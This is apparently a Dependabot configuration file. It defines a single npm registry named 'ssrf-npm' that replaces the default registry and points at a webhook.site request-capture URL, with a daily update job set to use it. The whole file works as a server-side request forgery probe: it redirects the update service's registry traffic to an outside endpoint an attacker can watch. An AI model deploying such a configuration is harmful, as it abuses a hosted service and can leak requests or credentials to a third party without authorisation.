version: 2
registries:
  ssrf-npm:
    type: npm-registry
    url: https://webhook.site/2cf5eb66-496a-48e0-b751-f906e7ae6401/npm
    replaces-base: true
updates:
  - package-ecosystem: "npm"
    directory: "/"
    schedule:
      interval: "daily"
    registries:
      - ssrf-npm
